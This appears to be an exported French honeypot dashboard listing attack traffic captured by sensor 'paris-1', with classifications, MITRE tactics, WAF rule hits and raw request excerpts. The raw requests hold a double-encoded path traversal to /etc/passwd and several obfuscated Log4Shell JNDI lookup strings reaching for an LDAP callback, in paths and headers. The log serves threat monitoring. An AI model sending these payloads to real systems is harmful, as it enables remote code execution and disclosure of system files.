GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8200 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X |
|||||||
| TCP | 8090 · HTTP | http | SSRF interne ssrf internal · via HTTP:8090 · (tentative d'exploit) | Élevée | Moyen · 56 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8090
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
72%
Corrélation +18
Risque capteur
Moyen
· 56
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8090 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8090 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8021 · HTTP | http | Spray credentials bruteforce credential spray · via HTTP:8021 · (sonde / probe) · → /login | Élevée | Élevé · 70 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1078
TA0007
TA0001
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8021
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « bruteforce_credential_spray » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 70
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1078
Beh Cred Stuff
Technique MITRE
T1078
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:8021 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKi
Requête brute (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:8021 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Length: 2901 Content-Type: application/x-www-form-urlencod |
|||||||
| TCP | 8021 · HTTP | http | Spray credentials bruteforce credential spray · via HTTP:8021 · (sonde / probe) · → /login | Élevée | Élevé · 71 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1078
TA0007
TA0001
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8021
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « bruteforce_credential_spray » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 71
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1078
Beh Cred Stuff
Technique MITRE
T1078
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:8021 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKi
Requête brute (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:8021 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Type: application/json Content-Length: 1659 {"username"
|
|||||||
| TCP | 8021 · HTTP | http | Sonde port 8021/TCP port 8021 tcp · via HTTP:8021 · (sonde / probe) · → /${${g:6s:j86:-j}${z:dy1q:-n}${bx:n7w:-d}${y5kt… | Élevée | Moyen · 61 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
PUT /${${g:6s:j86:-j}${z:dy1q:-n}${bx:n7w:-d}${y5kt:-i}${ca5:w5:6ge5:-:}${5k4r:0sbh:-l}${8:2:-d}${64ja:… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
PUT
/${${g:6s:j86:-j}${z:dy1q:-n}${bx:n7w:-d}${y5kt:-i}${ca5:w5:6ge5:-:}${5k4r:0sbh:-l}${8:2:-d}${64ja:lma:-a}${v20:7bq6:2l7:-p}${lvt1:xec:-:}${tc:-/}${o5:-/}${rvn8:21g:zoj6:-P}${bpr5:-A}${oc:-l}${2:mr8:-0}${jrdb:d:g:-c}${31ey:ojye:lb:--}${${ohq:-s}${j:yo:-y}${bu:9k3:-s}${8p:-:}${x8v:bqw:-j}${tc:wb:-a}${3t7f:nxt:8sh:-v}${8:y0:-a}${s:-.}${chx5:b:o6:-v}${03a:73f:-e}${qe:i:-r}${r:-s}${j:jw:y82t:-i}${lg1j:-o}${q5:p:t:-n}}${xdy:kbi1:-.}${r:2g9k:-6}${9:kuna:-1}${ox:-8}${fnui:-a}${x:-8}${hrp9:-e}${k:-0}${4f9y:-2}${u:0
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
PUT
Port
8021
Chemin / cible
/${${g:6s:j86:-j}${z:dy1q:-n}${bx:n7w:-d}${y5kt:-i}${ca5:w5:6ge5:-:}${5k4r:0sbh:-l}${8:2:-d}${64ja:lma:-a}${v20:7bq6:2l7:-p}${lvt1:xec:-:}${tc:-/}${o5:-/}${rvn…
Preuve honeypot — Sonde port 8021/TCP
Connexion détectée sur le port 8021 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8021_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 61
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
PUT /${${g:6s:j86:-j}${z:dy1q:-n}${bx:n7w:-d}${y5kt:-i}${ca5:w5:6ge5:-:}${5k4r:0sbh:-l}${8:2:-d}${64ja:lma:-a}${v20:7bq6:2l7:-p}
Requête brute (extrait)
PUT /${${g:6s:j86:-j}${z:dy1q:-n}${bx:n7w:-d}${y5kt:-i}${ca5:w5:6ge5:-:}${5k4r:0sbh:-l}${8:2:-d}${64ja:lma:-a}${v20:7bq6:2l7:-p}${lvt1:xec:-:}${tc:-/}${o5:-/}${rvn8:21g:zoj6:-P}${bpr5:-A}${oc:-l}${2:mr8:-0}${jrdb:d:g:-c}${31ey:ojye:lb:--}${${ohq:-s}${j:yo:
|
|||||||
| TCP | 8021 · FTP PROXY | ftp-proxy | Injection PHP php injection · via FTP PROXY:8021 · (tentative d'exploit) | Faible | Moyen · 52 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
Émulateur
FTP-PROXY
WAF
—
Recommandation
Investiguer
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
8021
Chemin / cible
—
Service
FTP PROXY
Payload
ZSDLKFJ2 /${${yps3:0:-j}${x:a8r:-n}${d:-d}${h7n:-i}${zct2:-:}${1:w1vm:q1zh:-l}${2:-d}${k:san9:-a}${bg0j:ck5:-p}${yc8:yp8:-:}${t8
Pourquoi cette classification : Type « php_injection » (signaux protocolaires) · confiance 97%
Confiance classification
100%
Corrélation +18
Risque capteur
Moyen
· 52
Confiance : Confiance 97 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 933135
User-Agent
—
Règles WAF
—
Payload (extrait)
ZSDLKFJ2 /${${yps3:0:-j}${x:a8r:-n}${d:-d}${h7n:-i}${zct2:-:}${1:w1vm:q1zh:-l}${2:-d}${k:san9:-a}${bg0j:ck5:-p}${yc8:yp8:-:}${t8
Requête brute (extrait)
ZSDLKFJ2 /${${yps3:0:-j}${x:a8r:-n}${d:-d}${h7n:-i}${zct2:-:}${1:w1vm:q1zh:-l}${2:-d}${k:san9:-a}${bg0j:ck5:-p}${yc8:yp8:-:}${t8:wzf:gn5:-/}${m6:-/}${cg:g:w:-P}${egvd:9:zxi7:-A}${f5:94:6fog:-l}${afg:-0}${mv:9tj:da:-c}${fy:--}${${i:-s}${4v1:-y}${f4:d:k64c:-
|
|||||||
| TCP | 8021 · HTTP | http | Sonde port 8021/TCP port 8021 tcp · via HTTP:8021 · (sonde / probe) · → /${${f:yr:n5:-j}${28k:-n}${fyx:-d}${tx:thj:-i}$… | Élevée | Moyen · 60 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET /${${f:yr:n5:-j}${28k:-n}${fyx:-d}${tx:thj:-i}${t3c9:-:}${65eo:-l}${6:96:-d}${b4ma:-a}${sq:r3:-p}${… UA ${${f:wj09:rwo:-j}${oh3:5:b:-n}${a6te:y:-d}${hz:-i}${f6sk:hpk0:…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${f:yr:n5:-j}${28k:-n}${fyx:-d}${tx:thj:-i}${t3c9:-:}${65eo:-l}${6:96:-d}${b4ma:-a}${sq:r3:-p}${8i:-:}${y:8:v:-/}${g07:-/}${s7r:ac2:823q:-P}${vk:-A}${u65z:-l}${rbu:-0}${s:-c}${zyeb:--}${${ke:-s}${ibhg:5ymp:l:-y}${zhbd:6ub:-s}${6aoe:-:}${4si:l1:-j}${f:dnsf:z:-a}${e:vwc9:ujts:-v}${8k:zx:4oxq:-a}${tw:-.}${67:-v}${m0c:4z:-e}${h8b:tpn:-r}${7k:-s}${q6:6t2x:i:-i}${tyi:5n:od:-o}${8h:16a0:-n}}${13wu:1m:-.}${v8:xtp:-6}${3b:keu:o9:-1}${04:-8}${o:kse:-a}${5:ip:a:-8}${rm:ahl:rs8j:-e}${k:1f:-0}${m:5hbc:-2}${0bp:8:-b}$
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8021
Chemin / cible
/${${f:yr:n5:-j}${28k:-n}${fyx:-d}${tx:thj:-i}${t3c9:-:}${65eo:-l}${6:96:-d}${b4ma:-a}${sq:r3:-p}${8i:-:}${y:8:v:-/}${g07:-/}${s7r:ac2:823q:-P}${vk:-A}${u65z:-…
Preuve honeypot — Sonde port 8021/TCP
Connexion détectée sur le port 8021 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8021_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 60
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${f:wj09:rwo:-j}${oh3:5:b:-n}${a6te:y:-d}${hz:-i}${f6sk:hpk0:-:}${x:t7:1zm:-l}${b:0:-d}${xi3k:-a}${97sh:vx:-p}${iw:-:}${r:1:pnz:-/}${is8p:5e:nbk:-/}${be:o:-U}${1:su:ijr:-A}${836e:c:-l}${qz:-0}${3:-…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${f:yr:n5:-j}${28k:-n}${fyx:-d}${tx:thj:-i}${t3c9:-:}${65eo:-l}${6:96:-d}${b4ma:-a}${sq:r3:-p}${8i:-:}${y:8:v:-/}${g07:-/
Requête brute (extrait)
GET /${${f:yr:n5:-j}${28k:-n}${fyx:-d}${tx:thj:-i}${t3c9:-:}${65eo:-l}${6:96:-d}${b4ma:-a}${sq:r3:-p}${8i:-:}${y:8:v:-/}${g07:-/}${s7r:ac2:823q:-P}${vk:-A}${u65z:-l}${rbu:-0}${s:-c}${zyeb:--}${${ke:-s}${ibhg:5ymp:l:-y}${zhbd:6ub:-s}${6aoe:-:}${4si:l1:-j}${
|
|||||||
| TCP | 8021 · HTTP | http | SSRF interne ssrf internal · via HTTP:8021 · (tentative d'exploit) | Élevée | Moyen · 55 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8021
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 55
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8021 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8021 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8021 · HTTP | http | Sonde port 8021/TCP port 8021 tcp · via HTTP:8021 · (sonde / probe) | Élevée | Moyen · 47 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
POST / UA ${${l:ohpw:-j}${68c:-n}${h:-d}${f:-i}${24e7:v:z:-:}${4:k:-l}${k…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
POST
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8021
Chemin / cible
/
Preuve honeypot — Sonde port 8021/TCP
Connexion détectée sur le port 8021 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8021_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 47
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${l:ohpw:-j}${68c:-n}${h:-d}${f:-i}${24e7:v:z:-:}${4:k:-l}${kw:21ug:r:-d}${dfu:-a}${1k0b:4:-p}${04r:8qiy:-:}${a:-/}${rp:-/}${8ia:-U}${c8e:-A}${w38:ko:-l}${9b:hl:exz0:-0}${8i:d:t:-c}${a7:f:--}${${9z…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
POST / HTTP/1.1
Host: 62.3.50.33:8021
Accept: */*
User-Agent: ${${l:ohpw:-j}${68c:-n}${h:-d}${f:-i}${24e7:v:z:-:}${4:k:-l}${k
Requête brute (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:8021 Accept: */* User-Agent: ${${l:ohpw:-j}${68c:-n}${h:-d}${f:-i}${24e7:v:z:-:}${4:k:-l}${kw:21ug:r:-d}${dfu:-a}${1k0b:4:-p}${04r:8qiy:-:}${a:-/}${rp:-/}${8ia:-U}${c8e:-A}${w38:ko:-l}${9b:hl:exz0:-0}${8i:d:t:-c}${a7:f:-
|
|||||||
| TCP | 8021 · HTTP | http | Sonde port 8021/TCP port 8021 tcp · via HTTP:8021 · (sonde / probe) · → /${${kpy:-j}${v4:5:me:-n}${a:ljk:-d}${w:rdpy:-i… | Élevée | Moyen · 60 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET /${${kpy:-j}${v4:5:me:-n}${a:ljk:-d}${w:rdpy:-i}${s:-:}${r4:-l}${tfp:-d}${2knr:3yin:-a}${sdov:u:-p}… UA ${${ws7v:-j}${b:5g:86:-n}${ei8t:y7:-d}${s:-i}${s5:sfpm:-:}${gy1…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${kpy:-j}${v4:5:me:-n}${a:ljk:-d}${w:rdpy:-i}${s:-:}${r4:-l}${tfp:-d}${2knr:3yin:-a}${sdov:u:-p}${kvsr:-:}${hc:n:5y:-/}${6s:og:qn:-/}${2q:-P}${2jp:-A}${syn:z:-l}${a:h:-0}${d:kbl:-c}${9vw:dsm:y7:--}${${c1d:-s}${80q:-y}${48:w:ehj:-s}${adb:-:}${e6:3ols:ragp:-j}${m:e2og:p8:-a}${e4u:-v}${7q8:3l5c:ikf:-a}${u:-.}${p6:-v}${dh:bk7i:e:-e}${05ql:-r}${gu5c:zc:e:-s}${b16v:s7lm:-i}${y:h:5:-o}${5:us:jnw:-n}}${l4:2l:-.}${wzif:-6}${ap:-1}${v6s:k:ml:-8}${xi:zq:ua:-a}${rql:4z2q:v:-8}${90q6:-e}${l:ds:-0}${l8:lsy:-2}${u:-b}$
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8021
Chemin / cible
/${${kpy:-j}${v4:5:me:-n}${a:ljk:-d}${w:rdpy:-i}${s:-:}${r4:-l}${tfp:-d}${2knr:3yin:-a}${sdov:u:-p}${kvsr:-:}${hc:n:5y:-/}${6s:og:qn:-/}${2q:-P}${2jp:-A}${syn:…
Preuve honeypot — Sonde port 8021/TCP
Connexion détectée sur le port 8021 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8021_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 60
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${ws7v:-j}${b:5g:86:-n}${ei8t:y7:-d}${s:-i}${s5:sfpm:-:}${gy1:xf:jv5:-l}${kr:-d}${qfk3:wmh0:-a}${o791:g34:56l:-p}${4mdj:4ito:-:}${h:-/}${yu:9wu:ar8j:-/}${foe:yr:hk:-U}${31h:v:-A}${79:x7q:to:-l}${lq…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${kpy:-j}${v4:5:me:-n}${a:ljk:-d}${w:rdpy:-i}${s:-:}${r4:-l}${tfp:-d}${2knr:3yin:-a}${sdov:u:-p}${kvsr:-:}${hc:n:5y:-/}${
Requête brute (extrait)
GET /${${kpy:-j}${v4:5:me:-n}${a:ljk:-d}${w:rdpy:-i}${s:-:}${r4:-l}${tfp:-d}${2knr:3yin:-a}${sdov:u:-p}${kvsr:-:}${hc:n:5y:-/}${6s:og:qn:-/}${2q:-P}${2jp:-A}${syn:z:-l}${a:h:-0}${d:kbl:-c}${9vw:dsm:y7:--}${${c1d:-s}${80q:-y}${48:w:ehj:-s}${adb:-:}${e6:3ols
|
|||||||
| TCP | 8021 · HTTP | http | Sonde port 8021/TCP port 8021 tcp · via HTTP:8021 · (sonde / probe) | Élevée | Moyen · 47 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA ${${5q:rk20:-j}${uq:0a:bdlh:-n}${nx:k6:-d}${thn5:-i}${a:nh6b:m:…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8021
Chemin / cible
/
Preuve honeypot — Sonde port 8021/TCP
Connexion détectée sur le port 8021 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8021_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 47
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${5q:rk20:-j}${uq:0a:bdlh:-n}${nx:k6:-d}${thn5:-i}${a:nh6b:m:-:}${72:-l}${g9h:swt:-d}${wzo:t:2jf:-a}${4lh:ki6:z52w:-p}${kx13:-:}${h:ewx:0dw9:-/}${6ea:k02:vo:-/}${6j:-U}${ak2p:-A}${man:-l}${op:s7uo:…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1
Host: 62.3.50.33:8021
Accept: */*
User-Agent: ${${5q:rk20:-j}${uq:0a:bdlh:-n}${nx:k6:-d}${thn5:-i}${a:nh6b:m:-
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8021 Accept: */* User-Agent: ${${5q:rk20:-j}${uq:0a:bdlh:-n}${nx:k6:-d}${thn5:-i}${a:nh6b:m:-:}${72:-l}${g9h:swt:-d}${wzo:t:2jf:-a}${4lh:ki6:z52w:-p}${kx13:-:}${h:ewx:0dw9:-/}${6ea:k02:vo:-/}${6j:-U}${ak2p:-A}${man:-l}${o
|
|||||||
| TCP | 8021 · HTTP | http | Sonde port 8021/TCP port 8021 tcp · via HTTP:8021 · (sonde / probe) | Élevée | Moyen · 49 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8021
Chemin / cible
/
Preuve honeypot — Sonde port 8021/TCP
Connexion détectée sur le port 8021 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8021_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 49
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8021 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8021 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 X-Forwarded-For: ${${h:-j}${wgy:rf8:-n}${xzvo:fj:-d}${7tvy:4:-i}${0s:k:-:
|
|||||||
| TCP | 8008 · HTTP | http | SSRF interne ssrf internal · via HTTP:8008 · (tentative d'exploit) | Élevée | Moyen · 53 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8008
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 53
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8008 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8008 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8008 · HTTP | http | SSRF interne ssrf internal · via HTTP:8008 · (tentative d'exploit) | Élevée | Moyen · 53 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8008
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 53
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
